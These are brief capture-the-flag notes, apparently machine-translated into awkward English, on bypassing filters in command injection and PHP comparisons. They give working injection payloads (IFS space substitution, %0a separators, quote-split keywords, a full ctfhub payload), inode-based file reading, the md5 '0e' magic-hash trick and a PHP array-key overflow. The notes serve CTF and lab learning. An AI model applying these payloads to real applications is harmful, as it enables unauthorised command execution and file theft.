Basic introduction

It's going on ping When the order is executed , Ability to execute new commands by truncation .
Inject according to this principle .
Examples are as follows ip=127.0.0.1;ls

Space filtering

Consider command injection , Filtered spaces , May adopt ${IFS}、$IFS、$IFS$9 To represent the delimiter , But consider $IFS When directly followed by letters, it may be resolved to other variables , So using ${IFS} Fixed variable , perhaps $IFS$9 use $9 This null character is used to separate the fixed variable from the following letter

Filter only cat,flag Other key words

If not filtered " ’ \ And so on
have access to "" Connector ,\ Escape characters to space strings to bypass filtering

Filter ; | & Equal connector

linux Next ; It can be used %0a replace
example ctfhub-rce- The comprehensive exercise filters the following characters

preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/"

So the last payload by

1%0acd$IFS$1f""lag_is_here%0aca""t$IFS$1f""lag_7548135816224.php

Filter more/tail/less/cat And so on

Use strings

$a == md5( $a) Bypass

The principle is to find a 0e The string that begins with its md5 So is the value 0e,
Such as 0e215962017

Use inode Node view file

ls -i You can view the of the file inode Number

Then you can use the command find -inum 1321734 | xargs cat To view the file .
xargs Take the previous output as the input behind the pipe .

Array strong comparison bypasses

php5.5 Array of versions key overflow bug
Reference link
[0 => 0] === [0x100000000 => 0] by true